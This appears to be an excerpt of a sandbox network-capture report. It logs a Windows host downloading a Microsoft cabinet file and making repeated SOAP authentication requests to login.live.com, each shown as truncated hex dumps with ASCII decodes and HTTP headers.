                                                                                                                                                                                                                                                                2024-08-12 13:22:48 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                                                                                                                Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                                                                                                                2024-08-12 13:22:48 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                                                                                                                Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                4192.168.2.44974920.190.159.73443
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:22:48 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Content-Type: application/soap+xml
                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                                                Content-Length: 3592
                                                                                                                                                                                                                                                                Host: login.live.com
                                                                                                                                                                                                                                                                2024-08-12 13:22:48 UTC3592OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                                                2024-08-12 13:22:49 UTC653INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                                                Expires: Mon, 12 Aug 2024 13:21:48 GMT
                                                                                                                                                                                                                                                                P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                                                FdrTelemetry: &481=21&59=33&213=10&215=0&315=1&215=0&315=1&214=56&288=16.0.30293.4
                                                                                                                                                                                                                                                                Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                x-ms-route-info: C508_SN1
                                                                                                                                                                                                                                                                x-ms-request-id: 2b7b310b-cebe-4661-bb69-18bbe8c6d15b
                                                                                                                                                                                                                                                                PPServer: PPV: 30 H: SN1PEPF0002F071 V: 0
                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:22:48 GMT
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 11389
                                                                                                                                                                                                                                                                2024-08-12 13:22:49 UTC11389INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                5192.168.2.44975120.190.159.73443
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:22:50 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Content-Type: application/soap+xml
                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                                                Content-Length: 4775
                                                                                                                                                                                                                                                                Host: login.live.com
                                                                                                                                                                                                                                                                2024-08-12 13:22:50 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                                                2024-08-12 13:22:51 UTC568INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                                                Expires: Mon, 12 Aug 2024 13:21:51 GMT
                                                                                                                                                                                                                                                                P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                                                Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                x-ms-route-info: C533_SN1
                                                                                                                                                                                                                                                                x-ms-request-id: 77aaa91d-cb16-4233-afda-8a2ff3008632
                                                                                                                                                                                                                                                                PPServer: PPV: 30 H: SN1PEPF0002F0FD V: 0
                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:22:51 GMT
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 1918
                                                                                                                                                                                                                                                                2024-08-12 13:22:51 UTC1918INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                6192.168.2.44975220.190.159.73443
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:22:52 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Content-Type: application/soap+xml
                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                                                Content-Length: 4775
                                                                                                                                                                                                                                                                Host: login.live.com
                                                                                                                                                                                                                                                                2024-08-12 13:22:52 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                                                2024-08-12 13:22:53 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                                                Expires: Mon, 12 Aug 2024 13:21:52 GMT
                                                                                                                                                                                                                                                                P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                                                Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                x-ms-route-info: C508_SN1
                                                                                                                                                                                                                                                                x-ms-request-id: ac1c759e-5983-49aa-943e-50d188378fc0
                                                                                                                                                                                                                                                                PPServer: PPV: 30 H: SN1PEPF0003FB4A V: 0
                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:22:52 GMT
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 11389
                                                                                                                                                                                                                                                                2024-08-12 13:22:53 UTC11389INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                7192.168.2.44975320.190.159.73443
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:22:53 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Content-Type: application/soap+xml
                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                                                Content-Length: 4775
                                                                                                                                                                                                                                                                Host: login.live.com
                                                                                                                                                                                                                                                                2024-08-12 13:22:53 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                                                2024-08-12 13:22:54 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                                                Expires: Mon, 12 Aug 2024 13:21:54 GMT
                                                                                                                                                                                                                                                                P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                                                Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                x-ms-route-info: C508_BAY
                                                                                                                                                                                                                                                                x-ms-request-id: 16f45a04-358b-4fe6-859c-7a919f2f45ed
                                                                                                                                                                                                                                                                PPServer: PPV: 30 H: PH1PEPF00011E09 V: 0
                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:22:53 GMT
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 11389
                                                                                                                                                                                                                                                                2024-08-12 13:22:54 UTC11389INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                8192.168.2.44975620.190.159.73443
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:22:55 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Content-Type: application/soap+xml
                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                                                Content-Length: 4742
                                                                                                                                                                                                                                                                Host: login.live.com
                                                                                                                                                                                                                                                                2024-08-12 13:22:55 UTC4742OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                                                2024-08-12 13:22:55 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                                                Expires: Mon, 12 Aug 2024 13:21:55 GMT
                                                                                                                                                                                                                                                                P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                                                Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                x-ms-route-info: C508_BAY
                                                                                                                                                                                                                                                                x-ms-request-id: e1cd626c-08a8-43be-9068-74906746345b
                                                                                                                                                                                                                                                                PPServer: PPV: 30 H: PH1PEPF00018214 V: 0
                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:22:54 GMT
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 10197
                                                                                                                                                                                                                                                                2024-08-12 13:22:55 UTC10197INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
